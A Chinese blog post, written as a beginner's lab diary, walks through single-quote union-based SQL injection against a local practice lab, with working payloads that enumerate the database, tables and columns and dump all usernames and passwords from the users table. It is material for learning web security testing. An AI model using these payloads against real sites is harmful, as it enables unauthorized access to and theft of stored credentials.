【SQL注入攻击】Single quotes(单引号型注入)

已于 2022-10-31 20:49:54 修改
阅读量1.3k 收藏 5
点赞数
分类专栏: 漏洞学习 文章标签: sql 数据库
于 2022-10-20 20:28:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sm1918451478/article/details/127434111
版权

这也只是个菜鸟的学习日记,如果有不对的地方欢迎指正

定义

参数使用「单引号」包裹时,叫做单引号字符型注入​

前期准备

利用docker的靶场,如果直接进入关卡的话,会出现一下提示

 无法连接到数据库:安全性

需要先创建数据库,在这个靶场中可以自动创建

 点击Setup/reset Database for labs

 提示:请输入ID作为带数值的参数

利用hackbar插件

页面观察

注入id=1、id=2

 会有回显,且id不同回显内容也有所不同

判断注入点

尝试注入id=1'

回显报错了,但是这个报错的内容也是很有用的,提示每次从0开始,只读取一行数据

 而且分析可以得到的是,我们的输入的单引号一定是成对输入的,且是在数值的同一侧,否则就是注入后会自动添加',导致在实际的sql语句中出现引号没有闭上的问题,从而报错​

1、单引号成对出现在数值左边,那么传进去的值就是空的''1​,回显是为空的

 2、单引号是在数值的右边,那么传入的就是数值1''​,回显就是id=1对应的数据

 通过观察页面的报错提示可以发现我们的输入值其实是由两个单引号包裹的,初步判断注入类型为单引号型注入

判断数据库的数据类型

​拼接1和2,注入1'and'1'='2,没有回显​

 注入1'and'1'='1​

查询资料得知,数据库中id的数据类型设置为int的话,上面两种测试都回显id=1的内容,说明该数据库的id不是int型

判断字段数

1' order by 1/2/3/...;--+​

发现当 1' order by 4...;--+​以及比4大的数,就会报错了,说明只有3个字段

判断显示位

在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位​

?id=1' and 0 union select 1,2,3 --+

 在union select 前加入 “and 0" 前部语句条件为假,就是为了不显示id=1之前的数据,也可以用id=-1​

可以得到,显示位是2,3,那么说明网页只能够显示第2、3列中信息,不能显示其他列的信息。

爆数据库名

?id=1'and 0 union select 1,database(),3--+

 爆数据库中的表

?id=1' and 0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 爆数据库的字段

?id=1' and 0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

 爆数据库的所有内容

?id=1' and 0 union select 1,group_concat(concat_ws(':',id,username,password)),3 from users --+

就这样,我人生第一次自己动手将数据脱库的过程就实现了

此外还可以尝试一下万能密码

Cinnam0n
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入——单引号注入sqli-labs-less1)
pluto_23的博客
07-22 4391
sql注入的基本步骤: 1.判断是否有注入(判断是否严格校验)——第一个要素 1)可控参数的改变能否影响页面显示结果 2)输入的sql语句是否能报错--能通过数据库的报错看到一些数据库的语句痕迹 3)输入的sql语句能否不报错——我们的语句可以成功闭合 2.判断是什么类注入 3.语句是否能够被恶意修改(如添加单引号,双引号等)——第二个要素 4.是否能够成功执行——第三个要素 5.获取我们想要的数据 数据库->表->字段->值 环境选择:sqli-l...
关于sql注入单引号的解决
mochenxue的博客
06-11 613
1. 这边我们采用java的String进行替换为\\",\\ 主要是用于标识这是单引号与前端传来的真正"进行区分,然后写入数据库中。2. 这里我写了一个StringUtil类进行符号的替换和解析。
SQL注入分类,一看你就明白了。SQL注入SQL注入 SQL注入有几种 SQL注入点分类
最新发布
2401_84281748的博客
05-17 997
字符可以使用单引号包裹,也可以使用双引号包裹,根据包裹字符串的「引号」不同,字符注入可以分为:「单引号字符注入和「双引号字符注入。参数使用「单引号」包裹时,叫做单引号字符注入,比如下面这个SQL,就是单引号字符注入。参数使用「双引号」包裹时,叫做双引号字符注入,比如下面这个SQL,就是双引号字符注入SQL的语法,支持使用一个或多个「括号」包裹参数,使得这两个基础的注入存在一些变种。后台对应的SQL如下,字段类是字符,这种就是字符注入。比如下面这个根据ID查询用户的功能。
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 9006
SQL注入原理-字符注入
sql 单引号_SQL注入
weixin_39526564的博客
12-06 1590
SQL注入漏洞SQL注入原理程序员在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句未对用户可控参数进行足够的过滤,便将参数内容拼接到SQL语句SQL注入漏洞的危害攻击者可以利用SQL注入漏洞,可以获取数据库中的多种信息(管理员后台账密等),从而脱去数据库的内容(脱库)。在特别的情况下还可以修改数据库的内容、插入内容到数据库或者删除数据库的内容。如果数据库权限分配存在问题,或者数据库本身...
SQL 登录注入脚本_三种数据库SQL 注入详解
weixin_39781930的博客
11-20 661
SQL 注入原理SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。SQL 注入分类1. 数字注入当输入的参数为整时,则有可能存在数字注入漏洞。假设存在一条 URL 为:HTTP://www.aaa.com/test....
PHP与SQL注入攻击[二]
10-30
SQL注入攻击是黑客通过向应用程序提交恶意SQL代码,从而控制或操纵数据库的一种手段。这种攻击方式可能导致数据泄露、用户账户被劫持,甚至整个数据库的破坏。 **Magic Quotes** 是PHP早期提供的一种安全特性,用于...
PHP+SQL 注入攻击的技术实现以及预防办法
10-28
首先,我们来详细讨论引发SQL注入攻击的两个主要原因: 1. **`magic_quotes_gpc`选项未开启**:在PHP配置文件`php.ini`中,`magic_quotes_gpc`选项默认设置为`On`,它会自动为所有GET、POST和COOKIE数据添加反斜杠...
sql注入原理及php防注入代码.doc
12-02
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在用户输入中注入恶意SQL代码来访问或修改敏感数据。防止SQL注入需要了解SQL注入原理和防止SQL注入的方法。 基本概念 PHP中的magic_quotes_gpc设置可以...
浅谈开启magic_quote_gpc后的sql注入攻击与防范
01-21
通过启用php.ini配置文件中的相关选项,就可以将大部分想利用SQL注入漏洞的骇客拒绝于门外。... 虽然如此,攻击者仍然有机会进行SQL注入攻击。。。。。。前提是,当参数为数字的时候,且未经过Int
sql 单引号_我对SQL注入的认知
weixin_39880318的博客
11-26 509
关于SQL注入1.什么是sql注入sql注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手段。2.sql注入原理SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。3.如何寻找注入点首先,we...
SQL注入原理》
小夜
07-21 1111
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL   Injection,即SQL注入。 SQL注入是从正常的WWW端口
(手工)【sqli-labs5-6】GET方法、单双引号、报错注入:基本步骤、错误注入过程
05-28 925
【报错注入+闭合】
sql注入手法详解
热门推荐
m0_71299382的博客
11-26 1万+
sql注入总结
sql注入知识点
m0_55772907的博客
04-27 3616
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
SQL注入分类,一看你就明白了。SQL注入点_SQL注入_SQL注入有几种_SQL注入点分类
ZL_1618的博客
07-19 407
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dN1M6UyX-1689305072146)(C:\Users\Administrator\Desktop\SQL注入思维导图.png)]
Python之字符串
Roar冷颜的博客
08-04 615
字符串1 字符串(Single quotes)2 字符串(Double quotes)3 转义字符4 原始字符串5 字符串(Triple quotes)6 字符串加法和乘法   Python 字符串的编写方式多种多样,主要有:Single quotes、Double quotes 还有 Triple quoted 三种形式。 1 字符串(Single quotes)   Single quotes 是使用一对单引号将文本包含起来: >>> print('I love China') I l
【网络安全---sql注入(1)】你知道什么是SQL注入吗?知道如何通过SQL注入来控制目标服务器吗?一篇文章教你sql注入漏洞的原理及方法
m0_67844671的博客
09-19 1103
SQL注入漏洞详解。包括原理,分类比如数字,字符,搜索,xx,宽字节注入,报错注入,盲注,有无回显等,各种注入payload以及产生原因等等
我的SQL注入学习:
weixin_46954909的博客
09-29 2991
经验总结
PHP+MySQL注入详解与防范策略
文章接下来纠正了一个常见的误区,即许多人认为在PHP+MySQL环境下,必须使用单引号进行注入,实际上,随着技术的进步,已经可以通过特定技巧构造不带引号的有效SQL语句,只要具备足够的经验和技巧,构建攻击的成功率...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值